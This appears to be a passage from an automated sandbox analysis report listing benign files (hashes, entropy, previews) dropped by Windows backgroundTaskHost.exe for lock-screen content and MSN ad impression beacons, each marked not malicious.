                                                                              Preview:https://arc.msn.com/v3/Delivery/Events/Impression=&PID=425106558&TID=700342085&CID=128000000001392729&BID=230696396&PG=PC000P0FR5.0000000IQ8&TPID=425106558&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ASID=b9de0c2b2b3648e8a125cac302df5505&TIME=20220720T155359Z&SLOT=2&REQT=20220720T155055&MA_Score=2&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=62f7fc83080b4ea4bc961e27c15af7da&BCNT=1&PG=PC000P0FR5.0000000IQ8&UNID=314559&MAP_TID=F45BD19D-6B8E-42A3-8BE3-7AB3D0A2D2E6&NCT=1&PN=DA63DF93-3DBC-42AE-A505-B34988683AC7&ASID=BEEDE8C6B3A34585A9CD2D88614A35DA&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ARC=1&EMS=1&LOCALE=EN-US&COUNTRY=US&HTD=-1&LANG=1033&DEVLANG=EN&CIP=84.17.52.2&OPTOUTSTATE=256&HTTPS=1&PRODID=00000000-0000-0000-0000-000000000000&DVTP=2&DEVOSVER=10.0.17134.1&DEVOSMAJ=10&DEVOSMIN=0&DEVOSBLD=17134&DEVOSMINBLD=1&LOD=1118&LOH=24&LO=1611218&RAFB=0&MARKETBASEDCOUNTRY=US&CLR=CDM&CFMT=TEXT%2CIMAGE&SFT=JPEG%2CPNG%2CGIF%2CJPG&H=1&W=1&TP=1&FESVER=1.3&CACHE_CHS=0&CACHE_IMP=0&CACHE_CHF=0&CACH

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\314559\imprbeacons.dat.~tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2891
                                                                              Entropy (8bit):5.225642587566377
                                                                              Encrypted:false
                                                                              SSDEEP:48:eSES2LHfaGujPqLILqfsBubT+TkS8ZU+8Levau6NPqLILqfsBubT+TkSl:YzGyE6z+e8iAyE6z+F
                                                                              MD5:42D4299132893EF8141AF34C24DBBB92
                                                                              SHA1:32FEC784B8ADADE06F008FA913C7255398BA88C9
                                                                              SHA-256:18F3543B099494441385E2B2D35A6DDDA21BFB6F0EEC9DA22214AE89C84D7AD1
                                                                              SHA-512:7E42ADF6640F9224E638A839416183362D6801CEB86C6DA9048AD7BBEA33BFB7347B922FF0EC0A3E40631C47C383025BB0D5D564D9F1A4D12EFBDC8FBC09D834
                                                                              Malicious:false
                                                                              Preview:https://arc.msn.com/v3/Delivery/Events/Impression=&PID=425106558&TID=700342085&CID=128000000001392729&BID=230696396&PG=PC000P0FR5.0000000IQ8&TPID=425106558&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ASID=b9de0c2b2b3648e8a125cac302df5505&TIME=20220720T155359Z&SLOT=2&REQT=20220720T155055&MA_Score=2&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=62f7fc83080b4ea4bc961e27c15af7da&BCNT=1&PG=PC000P0FR5.0000000IQ8&UNID=314559&MAP_TID=F45BD19D-6B8E-42A3-8BE3-7AB3D0A2D2E6&NCT=1&PN=DA63DF93-3DBC-42AE-A505-B34988683AC7&ASID=BEEDE8C6B3A34585A9CD2D88614A35DA&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ARC=1&EMS=1&LOCALE=EN-US&COUNTRY=US&HTD=-1&LANG=1033&DEVLANG=EN&CIP=84.17.52.2&OPTOUTSTATE=256&HTTPS=1&PRODID=00000000-0000-0000-0000-000000000000&DVTP=2&DEVOSVER=10.0.17134.1&DEVOSMAJ=10&DEVOSMIN=0&DEVOSBLD=17134&DEVOSMINBLD=1&LOD=1118&LOH=24&LO=1611218&RAFB=0&MARKETBASEDCOUNTRY=US&CLR=CDM&CFMT=TEXT%2CIMAGE&SFT=JPEG%2CPNG%2CGIF%2CJPG&H=1&W=1&TP=1&FESVER=1.3&CACHE_CHS=0&CACHE_IMP=0&CACHE_CHF=0&CACH

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\1658332419 (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):52590
                                                                              Entropy (8bit):3.858201201622904
                                                                              Encrypted:false
                                                                              SSDEEP:768:LmdAB13hYoOCVO82XMaqnkQAQqQf8nkcJ:Lmy9uu39kke
                                                                              MD5:39FA0B52E1D46BC8E3DCF5820F17AA9A
                                                                              SHA1:017E74C26A9CEC933BDA4D064DEAC9909CD3A004
                                                                              SHA-256:4A9686BE3A4B05DD922219DDF61A481265CEC3B6CB46758A8801B9EFD6E1D0F0
                                                                              SHA-512:C9C36FB9E8B3A12F1AE7AC7813A3A18C824FD47A422856FE628ADE8B8C83DA2C838855D1CBE49BAC578DC47A4B0461187E640CEC4B506C43D927DC94773BBBA6
                                                                              Malicious:false
                                                                              Preview:..{.".b.a.t.c.h.r.s.p.".:.{.".v.e.r.".:.".1...0.".,.".i.t.e.m.s.".:.[.{.".i.t.e.m.".:.".{.\.".f.\.".:.\.".r.a.f.\.".,.\.".v.\.".:.\.".1...0.\.".,.\.".r.d.r.\.".:.[.{.\.".c.\.".:.\.".C.D.M.\.".,.\.".u.\.".:.\.".S.u.b.s.c.r.i.b.e.d.C.o.n.t.e.n.t.\.".}.].,.\.".a.d.\.".:.{.\.".c.l.a.s.s.\.".:.\.".c.o.n.t.e.n.t.\.".,.\.".c.o.l.l.e.c.t.i.o.n.s.\.".:.[.].,.\.".n.a.m.e.\.".:.\.".L.o.c.k.S.c.r.e.e.n.\.".,.\.".p.r.o.p.e.r.t.y.M.a.n.i.f.e.s.t.\.".:.{.\.".l.a.n.d.s.c.a.p.e.I.m.a.g.e.\.".:.{.\.".t.y.p.e.\.".:.\.".i.m.a.g.e.\.".}.,.\.".p.o.r.t.r.a.i.t.I.m.a.g.e.\.".:.{.\.".t.y.p.e.\.".:.\.".i.m.a.g.e.\.".}.,.\.".s.h.o.w.I.m.a.g.e.O.n.S.e.c.u.r.e.L.o.c.k.\.".:.{.\.".i.s.O.p.t.i.o.n.a.l.\.".:.t.r.u.e.,.\.".t.y.p.e.\.".:.\.".b.o.o.l.e.a.n.\.".}.,.\.".o.n.R.e.n.d.e.r.\.".:.{.\.".t.y.p.e.\.".:.\.".a.c.t.i.o.n.\.".}.}.,.\.".p.r.o.p.e.r.t.i.e.s.\.".:.{.\.".l.a.n.d.s.c.a.p.e.I.m.a.g.e.\.".:.{.\.".f.i.l.e.S.i.z.e.\.".:.1.7.0.8.8.6.5.,.\.".h.e.i.g.h.t.\.".:.1.0.8.0.,.\.".s.h.a.2.5.6.\.".:.\.".D.0.H.X.2.8.n.y.

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\1658332419.~tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):52590
                                                                              Entropy (8bit):3.858201201622904
                                                                              Encrypted:false
                                                                              SSDEEP:768:LmdAB13hYoOCVO82XMaqnkQAQqQf8nkcJ:Lmy9uu39kke
                                                                              MD5:39FA0B52E1D46BC8E3DCF5820F17AA9A
                                                                              SHA1:017E74C26A9CEC933BDA4D064DEAC9909CD3A004
                                                                              SHA-256:4A9686BE3A4B05DD922219DDF61A481265CEC3B6CB46758A8801B9EFD6E1D0F0
                                                                              SHA-512:C9C36FB9E8B3A12F1AE7AC7813A3A18C824FD47A422856FE628ADE8B8C83DA2C838855D1CBE49BAC578DC47A4B0461187E640CEC4B506C43D927DC94773BBBA6
                                                                              Malicious:false
                                                                              Preview:..{.".b.a.t.c.h.r.s.p.".:.{.".v.e.r.".:.".1...0.".,.".i.t.e.m.s.".:.[.{.".i.t.e.m.".:.".{.\.".f.\.".:.\.".r.a.f.\.".,.\.".v.\.".:.\.".1...0.\.".,.\.".r.d.r.\.".:.[.{.\.".c.\.".:.\.".C.D.M.\.".,.\.".u.\.".:.\.".S.u.b.s.c.r.i.b.e.d.C.o.n.t.e.n.t.\.".}.].,.\.".a.d.\.".:.{.\.".c.l.a.s.s.\.".:.\.".c.o.n.t.e.n.t.\.".,.\.".c.o.l.l.e.c.t.i.o.n.s.\.".:.[.].,.\.".n.a.m.e.\.".:.\.".L.o.c.k.S.c.r.e.e.n.\.".,.\.".p.r.o.p.e.r.t.y.M.a.n.i.f.e.s.t.\.".:.{.\.".l.a.n.d.s.c.a.p.e.I.m.a.g.e.\.".:.{.\.".t.y.p.e.\.".:.\.".i.m.a.g.e.\.".}.,.\.".p.o.r.t.r.a.i.t.I.m.a.g.e.\.".:.{.\.".t.y.p.e.\.".:.\.".i.m.a.g.e.\.".}.,.\.".s.h.o.w.I.m.a.g.e.O.n.S.e.c.u.r.e.L.o.c.k.\.".:.{.\.".i.s.O.p.t.i.o.n.a.l.\.".:.t.r.u.e.,.\.".t.y.p.e.\.".:.\.".b.o.o.l.e.a.n.\.".}.,.\.".o.n.R.e.n.d.e.r.\.".:.{.\.".t.y.p.e.\.".:.\.".a.c.t.i.o.n.\.".}.}.,.\.".p.r.o.p.e.r.t.i.e.s.\.".:.{.\.".l.a.n.d.s.c.a.p.e.I.m.a.g.e.\.".:.{.\.".f.i.l.e.S.i.z.e.\.".:.1.7.0.8.8.6.5.,.\.".h.e.i.g.h.t.\.".:.1.0.8.0.,.\.".s.h.a.2.5.6.\.".:.\.".D.0.H.X.2.8.n.y.

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\1658332433 (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):49190
                                                                              Entropy (8bit):3.863199191433258
                                                                              Encrypted:false
                                                                              SSDEEP:768:9fqoWqhrqFi+IITcimdQjDQjE1QjmhvzaTctltiZt7tip0+rWZTcC:9Smo4DITjmeglY+TuS540tZTN
                                                                              MD5:E43EBDDD8B2B9497A88F32D20707E27E
                                                                              SHA1:040D7C4180CF11B349801711C203279209443DAE
                                                                              SHA-256:9F2786F0CDB696D97AAB7A45258D35A8EEB8B3C0A337331788B112731669D514
                                                                              SHA-512:9B109383DF33EA2A64864C5995B1F23011C0B7A2FB1485F5A9C2277DEF1DAAA0366331115C72A21120A92CA83F8429FD58FB0FBD2CFE2D516F496A0C3B14CCCF
                                                                              Malicious:false
                                                                              Preview:..{.".b.a.t.c.h.r.s.p.".:.{.".v.e.r.".:.".1...0.".,.".i.t.e.m.s.".:.[.{.".i.t.e.m.".:.".{.\.".f.\.".:.\.".r.a.f.\.".,.\.".v.\.".:.\.".1...0.\.".,.\.".r.d.r.\.".:.[.{.\.".c.\.".:.\.".C.D.M.\.".,.\.".u.\.".:.\.".S.u.b.s.c.r.i.b.e.d.C.o.n.t.e.n.t.\.".}.].,.\.".a.d.\.".:.{.\.".c.l.a.s.s.\.".:.\.".c.o.n.t.e.n.t.\.".,.\.".c.o.l.l.e.c.t.i.o.n.s.\.".:.[.].,.\.".n.a.m.e.\.".:.\.".L.o.c.k.S.c.r.e.e.n.\.".,.\.".p.r.o.p.e.r.t.y.M.a.n.i.f.e.s.t.\.".:.{.\.".l.a.n.d.s.c.a.p.e.I.m.a.g.e.\.".:.{.\.".t.y.p.e.\.".:.\.".i.m.a.g.e.\.".}.,.\.".p.o.r.t.r.a.i.t.I.m.a.g.e.\.".:.{.\.".t.y.p.e.\.".:.\.".i.m.a.g.e.\.".}.,.\.".s.h.o.w.I.m.a.g.e.O.n.S.e.c.u.r.e.L.o.c.k.\.".:.{.\.".i.s.O.p.t.i.o.n.a.l.\.".:.t.r.u.e.,.\.".t.y.p.e.\.".:.\.".b.o.o.l.e.a.n.\.".}.,.\.".o.n.R.e.n.d.e.r.\.".:.{.\.".t.y.p.e.\.".:.\.".a.c.t.i.o.n.\.".}.}.,.\.".p.r.o.p.e.r.t.i.e.s.\.".:.{.\.".l.a.n.d.s.c.a.p.e.I.m.a.g.e.\.".:.{.\.".f.i.l.e.S.i.z.e.\.".:.6.4.7.1.1.1.,.\.".h.e.i.g.h.t.\.".:.1.0.8.0.,.\.".s.h.a.2.5.6.\.".:.\.".I.B.X.U.r.F.e.o.Q.

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\1658332433.~tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):49190
                                                                              Entropy (8bit):3.863199191433258
                                                                              Encrypted:false
                                                                              SSDEEP:768:9fqoWqhrqFi+IITcimdQjDQjE1QjmhvzaTctltiZt7tip0+rWZTcC:9Smo4DITjmeglY+TuS540tZTN
                                                                              MD5:E43EBDDD8B2B9497A88F32D20707E27E
                                                                              SHA1:040D7C4180CF11B349801711C203279209443DAE
                                                                              SHA-256:9F2786F0CDB696D97AAB7A45258D35A8EEB8B3C0A337331788B112731669D514
                                                                              SHA-512:9B109383DF33EA2A64864C5995B1F23011C0B7A2FB1485F5A9C2277DEF1DAAA0366331115C72A21120A92CA83F8429FD58FB0FBD2CFE2D516F496A0C3B14CCCF
                                                                              Malicious:false
                                                                              Preview:..{.".b.a.t.c.h.r.s.p.".:.{.".v.e.r.".:.".1...0.".,.".i.t.e.m.s.".:.[.{.".i.t.e.m.".:.".{.\.".f.\.".:.\.".r.a.f.\.".,.\.".v.\.".:.\.".1...0.\.".,.\.".r.d.r.\.".:.[.{.\.".c.\.".:.\.".C.D.M.\.".,.\.".u.\.".:.\.".S.u.b.s.c.r.i.b.e.d.C.o.n.t.e.n.t.\.".}.].,.\.".a.d.\.".:.{.\.".c.l.a.s.s.\.".:.\.".c.o.n.t.e.n.t.\.".,.\.".c.o.l.l.e.c.t.i.o.n.s.\.".:.[.].,.\.".n.a.m.e.\.".:.\.".L.o.c.k.S.c.r.e.e.n.\.".,.\.".p.r.o.p.e.r.t.y.M.a.n.i.f.e.s.t.\.".:.{.\.".l.a.n.d.s.c.a.p.e.I.m.a.g.e.\.".:.{.\.".t.y.p.e.\.".:.\.".i.m.a.g.e.\.".}.,.\.".p.o.r.t.r.a.i.t.I.m.a.g.e.\.".:.{.\.".t.y.p.e.\.".:.\.".i.m.a.g.e.\.".}.,.\.".s.h.o.w.I.m.a.g.e.O.n.S.e.c.u.r.e.L.o.c.k.\.".:.{.\.".i.s.O.p.t.i.o.n.a.l.\.".:.t.r.u.e.,.\.".t.y.p.e.\.".:.\.".b.o.o.l.e.a.n.\.".}.,.\.".o.n.R.e.n.d.e.r.\.".:.{.\.".t.y.p.e.\.".:.\.".a.c.t.i.o.n.\.".}.}.,.\.".p.r.o.p.e.r.t.i.e.s.\.".:.{.\.".l.a.n.d.s.c.a.p.e.I.m.a.g.e.\.".:.{.\.".f.i.l.e.S.i.z.e.\.".:.6.4.7.1.1.1.,.\.".h.e.i.g.h.t.\.".:.1.0.8.0.,.\.".s.h.a.2.5.6.\.".:.\.".I.B.X.U.r.F.e.o.Q.

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\1658332418 (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):8976
                                                                              Entropy (8bit):3.836508248417169
                                                                              Encrypted:false
                                                                              SSDEEP:96:LcTcgyUG8Kk4b/WfDwPdrj9O1WUFwPUrj9Tpk4btWfDwPdrj9YZV8iqj9/BUlk0H:LFK460PtcMUaP8U4w0Pt0IQlk0CRv5I
                                                                              MD5:0C22157A6362A735E625A7C4DC0E14A6
                                                                              SHA1:AFA79580F14CC01C09CA7EAF3D24E4A2A3FDBCB9
                                                                              SHA-256:063C89445F4AEBB18C4F28EDBB057052FC72221581F2B90168B377A9C3A6D06B
                                                                              SHA-512:10450031F9A15CF6FC05BB59211F226FF92072F7AC7327876B599B296D6FF91329BE3A7FE9A7F5DA8ADEFE5B247C98981F17BF589844BAAFA55922A21119285B
                                                                              Malicious:false
                                                                              Preview:..{.".b.a.t.c.h.r.s.p.".:.{.".v.e.r.".:.".1...0.".,.".i.t.e.m.s.".:.[.{.".i.t.e.m.".:.".{.\.".f.\.".:.\.".r.a.f.\.".,.\.".v.\.".:.\.".1...0.\.".,.\.".r.d.r.\.".:.[.{.\.".c.\.".:.\.".C.D.M.\.".,.\.".u.\.".:.\.".S.u.b.s.c.r.i.b.e.d.C.o.n.t.e.n.t.\.".}.].,.\.".a.d.\.".:.{.\.".c.l.a.s.s.\.".:.\.".c.o.n.t.e.n.t.\.".,.\.".c.o.l.l.e.c.t.i.o.n.s.\.".:.[.].,.\.".i.t.e.m.P.r.o.p.e.r.t.y.M.a.n.i.f.e.s.t.\.".:.{.\.".t.e.m.p.l.a.t.e.T.y.p.e.\.".:.{.\.".t.y.p.e.\.".:.\.".t.e.x.t.\.".}.,.\.".o.n.R.e.n.d.e.r.\.".:.{.\.".t.y.p.e.\.".:.\.".a.c.t.i.o.n.\.".}.}.,.\.".i.t.e.m.s.\.".:.[.{.\.".p.r.o.p.e.r.t.i.e.s.\.".:.{.\.".t.e.m.p.l.a.t.e.T.y.p.e.\.".:.{.\.".t.e.x.t.\.".:.\.".h.i.d.d.e.n.\.".}.,.\.".o.n.R.e.n.d.e.r.\.".:.{.\.".e.v.e.n.t.\.".:.\.".n.o.n.e.\.".,.\.".p.a.r.a.m.e.t.e.r.s.\.".:.{.\.".c.o.l.l.e.c.t.i.o.n.I.d.\.".:.\.".S.t.a.r.t...S.u.g.g.e.s.t.i.o.n.s.\.".}.,.\.".a.c.t.i.o.n.\.".:.\.".a.d.d.T.i.l.e.T.o.C.o.l.l.e.c.t.i.o.n.\.".}.}.,.\.".t.r.a.c.k.i.n.g.\.".:.{.\.".e.v.e.n.t.s.\.".:.[.{.\.".i.d.\.

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\1658332418.~tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):8976
                                                                              Entropy (8bit):3.836508248417169
                                                                              Encrypted:false
                                                                              SSDEEP:96:LcTcgyUG8Kk4b/WfDwPdrj9O1WUFwPUrj9Tpk4btWfDwPdrj9YZV8iqj9/BUlk0H:LFK460PtcMUaP8U4w0Pt0IQlk0CRv5I
                                                                              MD5:0C22157A6362A735E625A7C4DC0E14A6
                                                                              SHA1:AFA79580F14CC01C09CA7EAF3D24E4A2A3FDBCB9
                                                                              SHA-256:063C89445F4AEBB18C4F28EDBB057052FC72221581F2B90168B377A9C3A6D06B
                                                                              SHA-512:10450031F9A15CF6FC05BB59211F226FF92072F7AC7327876B599B296D6FF91329BE3A7FE9A7F5DA8ADEFE5B247C98981F17BF589844BAAFA55922A21119285B
                                                                              Malicious:false
                                                                              Preview:..{.".b.a.t.c.h.r.s.p.".:.{.".v.e.r.".:.".1...0.".,.".i.t.e.m.s.".:.[.{.".i.t.e.m.".:.".{.\.".f.\.".:.\.".r.a.f.\.".,.\.".v.\.".:.\.".1...0.\.".,.\.".r.d.r.\.".:.[.{.\.".c.\.".:.\.".C.D.M.\.".,.\.".u.\.".:.\.".S.u.b.s.c.r.i.b.e.d.C.o.n.t.e.n.t.\.".}.].,.\.".a.d.\.".:.{.\.".c.l.a.s.s.\.".:.\.".c.o.n.t.e.n.t.\.".,.\.".c.o.l.l.e.c.t.i.o.n.s.\.".:.[.].,.\.".i.t.e.m.P.r.o.p.e.r.t.y.M.a.n.i.f.e.s.t.\.".:.{.\.".t.e.m.p.l.a.t.e.T.y.p.e.\.".:.{.\.".t.y.p.e.\.".:.\.".t.e.x.t.\.".}.,.\.".o.n.R.e.n.d.e.r.\.".:.{.\.".t.y.p.e.\.".:.\.".a.c.t.i.o.n.\.".}.}.,.\.".i.t.e.m.s.\.".:.[.{.\.".p.r.o.p.e.r.t.i.e.s.\.".:.{.\.".t.e.m.p.l.a.t.e.T.y.p.e.\.".:.{.\.".t.e.x.t.\.".:.\.".h.i.d.d.e.n.\.".}.,.\.".o.n.R.e.n.d.e.r.\.".:.{.\.".e.v.e.n.t.\.".:.\.".n.o.n.e.\.".,.\.".p.a.r.a.m.e.t.e.r.s.\.".:.{.\.".c.o.l.l.e.c.t.i.o.n.I.d.\.".:.\.".S.t.a.r.t...S.u.g.g.e.s.t.i.o.n.s.\.".}.,.\.".a.c.t.i.o.n.\.".:.\.".a.d.d.T.i.l.e.T.o.C.o.l.l.e.c.t.i.o.n.\.".}.}.,.\.".t.r.a.c.k.i.n.g.\.".:.{.\.".e.v.e.n.t.s.\.".:.[.{.\.".i.d.\.

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\1658332423 (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):9034
                                                                              Entropy (8bit):3.8389419525759414
                                                                              Encrypted:false
                                                                              SSDEEP:192:LFK460P6PGQMUaP66G84w0P6PGYfzGUzi8k0tRv50:LMs6CJ6Cs6ZfDziWzv50
                                                                              MD5:9644CCFBD455E59B2AB9E75391D768D0
                                                                              SHA1:D0A96630C8C1ADCF80D462FE0FEE6E1C76D1ABA4
                                                                              SHA-256:63C0508697C9A388F237E62296BF1D6B50411FCDA76AEA0FAA0D5ECC9686E564
                                                                              SHA-512:C6C569B4F603BC2840233751EB83E52B661E123DEC384C60599CD2B85E68726285D60BA1E6D5E4D9EE94A99B761EE8C562B1DEDC3C517E92C67E38DB8D9929CC
                                                                              Malicious:false
                                                                              Preview:..{.".b.a.t.c.h.r.s.p.".:.{.".v.e.r.".:.".1...0.".,.".i.t.e.m.s.".:.[.{.".i.t.e.m.".:.".{.\.".f.\.".:.\.".r.a.f.\.".,.\.".v.\.".:.\.".1...0.\.".,.\.".r.d.r.\.".:.[.{.\.".c.\.".:.\.".C.D.M.\.".,.\.".u.\.".:.\.".S.u.b.s.c.r.i.b.e.d.C.o.n.t.e.n.t.\.".}.].,.\.".a.d.\.".:.{.\.".c.l.a.s.s.\.".:.\.".c.o.n.t.e.n.t.\.".,.\.".c.o.l.l.e.c.t.i.o.n.s.\.".:.[.].,.\.".i.t.e.m.P.r.o.p.e.r.t.y.M.a.n.i.f.e.s.t.\.".:.{.\.".t.e.m.p.l.a.t.e.T.y.p.e.\.".:.{.\.".t.y.p.e.\.".:.\.".t.e.x.t.\.".}.,.\.".o.n.R.e.n.d.e.r.\.".:.{.\.".t.y.p.e.\.".:.\.".a.c.t.i.o.n.\.".}.}.,.\.".i.t.e.m.s.\.".:.[.{.\.".p.r.o.p.e.r.t.i.e.s.\.".:.{.\.".t.e.m.p.l.a.t.e.T.y.p.e.\.".:.{.\.".t.e.x.t.\.".:.\.".h.i.d.d.e.n.\.".}.,.\.".o.n.R.e.n.d.e.r.\.".:.{.\.".e.v.e.n.t.\.".:.\.".n.o.n.e.\.".,.\.".p.a.r.a.m.e.t.e.r.s.\.".:.{.\.".c.o.l.l.e.c.t.i.o.n.I.d.\.".:.\.".S.t.a.r.t...S.u.g.g.e.s.t.i.o.n.s.\.".}.,.\.".a.c.t.i.o.n.\.".:.\.".a.d.d.T.i.l.e.T.o.C.o.l.l.e.c.t.i.o.n.\.".}.}.,.\.".t.r.a.c.k.i.n.g.\.".:.{.\.".e.v.e.n.t.s.\.".:.[.{.\.".i.d.\.

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\1658332423.~tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):9034
                                                                              Entropy (8bit):3.8389419525759414
                                                                              Encrypted:false
                                                                              SSDEEP:192:LFK460P6PGQMUaP66G84w0P6PGYfzGUzi8k0tRv50:LMs6CJ6Cs6ZfDziWzv50
                                                                              MD5:9644CCFBD455E59B2AB9E75391D768D0
                                                                              SHA1:D0A96630C8C1ADCF80D462FE0FEE6E1C76D1ABA4
                                                                              SHA-256:63C0508697C9A388F237E62296BF1D6B50411FCDA76AEA0FAA0D5ECC9686E564
                                                                              SHA-512:C6C569B4F603BC2840233751EB83E52B661E123DEC384C60599CD2B85E68726285D60BA1E6D5E4D9EE94A99B761EE8C562B1DEDC3C517E92C67E38DB8D9929CC
                                                                              Malicious:false
                                                                              Preview:..{.".b.a.t.c.h.r.s.p.".:.{.".v.e.r.".:.".1...0.".,.".i.t.e.m.s.".:.[.{.".i.t.e.m.".:.".{.\.".f.\.".:.\.".r.a.f.\.".,.\.".v.\.".:.\.".1...0.\.".,.\.".r.d.r.\.".:.[.{.\.".c.\.".:.\.".C.D.M.\.".,.\.".u.\.".:.\.".S.u.b.s.c.r.i.b.e.d.C.o.n.t.e.n.t.\.".}.].,.\.".a.d.\.".:.{.\.".c.l.a.s.s.\.".:.\.".c.o.n.t.e.n.t.\.".,.\.".c.o.l.l.e.c.t.i.o.n.s.\.".:.[.].,.\.".i.t.e.m.P.r.o.p.e.r.t.y.M.a.n.i.f.e.s.t.\.".:.{.\.".t.e.m.p.l.a.t.e.T.y.p.e.\.".:.{.\.".t.y.p.e.\.".:.\.".t.e.x.t.\.".}.,.\.".o.n.R.e.n.d.e.r.\.".:.{.\.".t.y.p.e.\.".:.\.".a.c.t.i.o.n.\.".}.}.,.\.".i.t.e.m.s.\.".:.[.{.\.".p.r.o.p.e.r.t.i.e.s.\.".:.{.\.".t.e.m.p.l.a.t.e.T.y.p.e.\.".:.{.\.".t.e.x.t.\.".:.\.".h.i.d.d.e.n.\.".}.,.\.".o.n.R.e.n.d.e.r.\.".:.{.\.".e.v.e.n.t.\.".:.\.".n.o.n.e.\.".,.\.".p.a.r.a.m.e.t.e.r.s.\.".:.{.\.".c.o.l.l.e.c.t.i.o.n.I.d.\.".:.\.".S.t.a.r.t...S.u.g.g.e.s.t.i.o.n.s.\.".}.,.\.".a.c.t.i.o.n.\.".:.\.".a.d.d.T.i.l.e.T.o.C.o.l.l.e.c.t.i.o.n.\.".}.}.,.\.".t.r.a.c.k.i.n.g.\.".:.{.\.".e.v.e.n.t.s.\.".:.[.{.\.".i.d.\.

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\eventbeacons.dat (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1180
                                                                              Entropy (8bit):5.385151819577346
                                                                              Encrypted:false
                                                                              SSDEEP:24:2AsfLW9g/OOIpZK7//hAsfLW9g/OOIpZK7//gj:psToSOPpZGXhAsToSOPpZGXgj
                                                                              MD5:65EB33016D1B4DB2040CDF583EF3B758
                                                                              SHA1:D985B7345D3CA9850DFE057B0BE00A12D184B4CE
                                                                              SHA-256:BBD72E11FAC5826D991FF15DC5BD26489F550E2B696AC5E6855A3940D49FD44E
                                                                              SHA-512:3CE2100B43852145BF6888C684E38ED8E873DC0E027A8A03141EED770145E68ED9927612B623AEAE5A75449C892BCEEDDD4826F210CE62FFE9854AAFC6CBF705
                                                                              Malicious:false
